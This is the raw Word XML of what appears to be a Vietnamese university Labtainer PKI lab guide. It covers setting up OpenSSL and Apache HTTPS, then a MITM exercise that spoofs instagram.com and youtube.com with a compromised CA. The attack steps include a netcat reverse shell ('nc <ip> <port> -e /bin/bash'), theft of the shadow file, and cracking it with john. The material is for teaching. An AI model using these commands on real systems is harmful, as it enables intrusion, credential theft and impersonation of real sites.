      <w:r w:rsidRPr="00C74ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> khóa bí mật trong </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>fi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0F27AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>server.pe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F4677AA" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00DC2083" w:rsidRDefault="00B039AD" w:rsidP="00B039A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69A992" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00DC2083" w:rsidRDefault="00B039AD" w:rsidP="00B039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9B26C5" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRDefault="00B039AD" w:rsidP="00B039A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74ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Thiết lập máy chủ SSL/TLS đơn giản và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>quan sát :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002B4084" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRDefault="00B039AD" w:rsidP="00B039AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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openssl s_server -cert server.pem -www</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1656BF7A" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00117F27" w:rsidRDefault="00B039AD" w:rsidP="00B039A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8FC75A7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ửa lại khóa bí mật trong file server.pem về cho đúng với ban đầu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283A50B5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ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Triển khai chứng chỉ trong trang web HTTPS dựa trên Apache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6036EEE6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74ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Tạo thư mục pki trong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/var/www</w:t>
      </w:r>
      <w:r w:rsidRPr="00C74ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> chứa file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index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3677D3FC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74ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Tạo thư mục ssl trong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/etc/apache2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0C29A3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C74ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy khóa và chứng chỉ server vào </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2083">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>/etc/apache2/ssl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A629CF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74ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">hêm mục Virtualhost vào tệp 000-default.conf với nội </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C74ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>dung :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="389EAAA3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&lt;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>VirtualHost *:80&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A051126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 xml:space="preserve">ServerName </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>PKILAB.com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F6FA1CA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DocumentRoot /var/www/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>pki</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289EAB0F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DirectoryIndex index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A152ED8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&lt;/VirtualHost&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B310D9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74ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>hêm mục Virtualhost vào tệp default-ssl.conf trong cùng một thư mục.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759A42C0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 xml:space="preserve">&lt;VirtualHost *:443&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FFAB7F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ServerName </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>PKILAB.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206308C5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DocumentRoot /var/www/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>pki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2543B0C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DirectoryIndex index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4469E7CB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SSLEngine On</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEE2592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SSLCertificateFile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/etc/apache2/ssl/ cert.pem </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24242F2D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SSLCertificateKeyFil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>/etc/apache2/ssl/key.pem</w:t>
      </w:r>
      <w:r w:rsidRPr="00C74ED1"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1B32A2B9" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00C74ED1" w:rsidRDefault="00B039AD" w:rsidP="00B039AD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74ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>&lt;/VirtualHost&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009950BA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0A48">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable SSL module và kích hoạt trang web chúng ta vừa thêm vào sau đó khởi động lại dịch vụ apache và nhậm mật khẩu đã đặt trước </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E40A48">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>đó :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="14BAA7EB" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00DC2083" w:rsidRDefault="00B039AD" w:rsidP="00B039AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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C2083">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sudo a2enmod ssl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C8ACA0" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00DC2083" w:rsidRDefault="00B039AD" w:rsidP="00B039AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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C2083">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sudo a2ensite default-ssl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48935BB1" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00DC2083" w:rsidRDefault="00B039AD" w:rsidP="00B039A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2083">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sudo systemctl restart apache2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58316420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</w:t>
      </w:r>
      <w:r w:rsidRPr="00431FDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>https://PKILab.com trên firefox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quan sát.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DAFCC2" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00431FDA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ởi</w:t>
      </w:r>
      <w:r w:rsidRPr="00431FDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> chạy cuộc tấn công MITM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611F9636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>Chỉnh sửa serverName trong default-ssl.conf thành instagram.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D279A6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>Chỉnh sửa /etc/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00431FDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>hosts :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00431FDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> localhost trỏ đến instagram.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C919B97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31FDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Khởi động lại dịch vụ apache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uy cập </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00D25064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instagram.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> bằng firefox và quan sát chuyện gì sẽ xảy ra rồi sau đó thử truy cập </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="006B1753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instagram.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="490AB1DE" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="000F27AF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p theo ta sẽ tiến hành tấn công MITM với CA bị khai thác và xem chuyện gì sẽ xảy ra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A566C76" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="0029579A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579A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Trên máy </w:t>
      </w:r>
      <w:r w:rsidRPr="000F27AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="0029579A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> khởi động netcat lắng nghe kết nối</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208BCA67" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="004A71D5" w:rsidRDefault="00B039AD" w:rsidP="00B039AD">
      <w:pPr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A71D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>nc -lnvp &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE09B99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579A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Trên máy </w:t>
      </w:r>
      <w:r w:rsidRPr="000F27AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidRPr="0029579A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> kết nối đến shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBE0FAE" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="004A71D5" w:rsidRDefault="00B039AD" w:rsidP="00B039AD">
      <w:pPr>
        <w:ind w:left="1440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4A71D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>nc &lt;ip&gt; &lt;port&gt; -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426C4A8C" w14:textId="77777777" w:rsidR="00B039AD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579A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Lấy</w:t>
      </w:r>
      <w:r w:rsidRPr="0029579A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> file shadow về máy và dùng john để crack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F74A983" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="0029579A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sh vào chiếm quyền kiểm soát máy server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4997D976" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00431FDA" w:rsidRDefault="00B039AD" w:rsidP="00B039A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>Phát động cuộc tấn công MITM với CA bị tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617E59A9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 xml:space="preserve">Tạo một yêu cầu kí mới cho </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00431FDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>host :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00431FDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> youtube.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47428169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 xml:space="preserve">Kí bằng chữ kí và khóa CA </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00431FDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>gốc :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5D6B6AE4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431FDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Copy chữ kí vào thư mục /etc/apache2/ssl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF08D2F" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRDefault="00B039AD" w:rsidP="00B039A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31FDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Ánh xạ localhost đên youtube.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> sau đó khởi động lại apache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truy cập </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00D25064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youtube.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> trên firefox và quan sát.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3365348B" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00F92C07" w:rsidRDefault="00B039AD" w:rsidP="00B039AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36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ết thúc bài lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9D84B3" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00F92C07" w:rsidRDefault="00B039AD" w:rsidP="00B039A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iểm tra checkwork:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F89673" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00191FF9" w:rsidRDefault="00B039AD" w:rsidP="00B039AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00191FF9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>checkwork</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B0A84C" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00F92C07" w:rsidRDefault="00B039AD" w:rsidP="00B039A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Trên terminal đầu tiên sử dụng câu lệnh sau để kết thục bài lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C354260" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00191FF9" w:rsidRDefault="00B039AD" w:rsidP="00B039AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00191FF9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Stoplab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624043C0" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00F92C07" w:rsidRDefault="00B039AD" w:rsidP="00B039A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hi bài lab kết thúc, một tệp zip lưu kết quả được tạp và lưu vào một vị trí hiển thị dưới stoplab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567405A6" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00F92C07" w:rsidRDefault="00B039AD" w:rsidP="00B039AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36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hởi động lại bài lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C099689" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00235409" w:rsidRDefault="00B039AD" w:rsidP="00B039AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="21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191FF9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Labtainer -r </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ptit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-pki-lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2656A7B4" w14:textId="77777777" w:rsidR="003B2040" w:rsidRPr="00B039AD" w:rsidRDefault="003B2040" w:rsidP="00B039AD"/>
    <w:sectPr w:rsidR="003B2040" w:rsidRPr="00B039AD" w:rsidSect="00B52BF0">
      <w:footerReference w:type="default" r:id="rId14"/>
      <w:pgSz w:w="12240" w:h="15840" w:code="1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9FA4" w14:textId="77777777" w:rsidR="00CB5B40" w:rsidRDefault="00CB5B40" w:rsidP="004860EB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0A81E903" w14:textId="77777777" w:rsidR="00CB5B40" w:rsidRDefault="00CB5B40" w:rsidP="0048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6883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3F6BA" w14:textId="7F5E87D0" w:rsidR="00B52BF0" w:rsidRDefault="00B52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A339A" w14:textId="77777777" w:rsidR="00B52BF0" w:rsidRDefault="00B5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D0DF" w14:textId="77777777" w:rsidR="00CB5B40" w:rsidRDefault="00CB5B40" w:rsidP="004860EB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3AB74F26" w14:textId="77777777" w:rsidR="00CB5B40" w:rsidRDefault="00CB5B40" w:rsidP="0048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B07"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A84E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822F4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="96B65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8C4021F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1558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D56"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="913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E99"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="75025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B01B5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="56E27B34"/>
    <w:lvl w:ilvl="0" w:tplc="17903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545A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A25AF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E7B6E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F9B8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5645"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9466A4D6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D478E3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FF145A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12DA73CB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F14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09CA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E4FA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64996"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D9F8AFC2"/>
    <w:lvl w:ilvl="0" w:tplc="F364F30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121DF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="61463216"/>
    <w:lvl w:ilvl="0" w:tplc="2134395E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7DA7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7032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6839FF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4C02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69C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B9568DD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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2859221B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="34CE26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B046E0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AB7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F592A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D7F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56EE7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9DB46826"/>
    <w:lvl w:ilvl="0" w:tplc="A6FC9B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F4E10"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FFEEF1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12B0A3E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5A8E4D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5651DC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C6A8AAA8"/>
    <w:lvl w:ilvl="0" w:tplc="5C5A7A1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sz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5A5FEC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
